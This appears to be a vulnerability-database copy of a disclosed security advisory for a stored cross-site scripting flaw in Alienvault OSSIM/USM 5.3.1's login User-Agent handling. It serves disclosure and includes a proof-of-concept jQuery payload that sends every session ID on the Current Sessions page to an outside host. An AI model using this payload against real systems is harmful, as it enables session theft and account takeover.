Lucene search
+L

Alienvault OSSIM/USM 5.3.1 Persistent Cross Site Scripting

🗓️ 02 Nov 2016 00:00:00Reported by Peter LappType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 33 Views

Alienvault OSSIM/USM 5.3.1 Persistent Cross Site Scripting vulnerabilit

Related
Code
`Details  
=======  
  
Product: Alienvault OSSIM/USM  
Vulnerability: Stored XSS  
Author: Peter Lapp, lappsec () gmail com  
CVE: CVE-2016-8581  
CVSS: 3.5  
Vulnerable Versions: <=5.3.1  
Fixed Version: 5.3.2  
  
  
  
Vulnerability Details  
=====================  
  
A stored XSS vulnerability exists in the User-Agent header of the  
login process. It's possible to inject a script into that header that  
then gets executed when mousing over the User-Agent field in Settings  
-> Current Sessions.  
  
  
  
POC  
===  
  
The POC uses jQuery to send all session IDs on the "Current Sessions"  
page to an arbitrary site (Google, in this case)  
  
<script>$('#ops_table  
.ops_id').each(function(){$.get("https://www.google.com/",{session:($(this).html())});});</script>  
  
  
  
Timeline  
========  
  
08/03/16 - Reported to Vendor  
10/03/16 - Fixed in version 5.3.2  
  
  
  
References  
==========  
  
https://www.alienvault.com/forums/discussion/7766/security-advisory-alienvault-5-3-2-address-70-vulnerabilities  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Nov 2016 00:00Current
6.3Medium risk
Vulners AI Score6.3
EPSS0.17058
33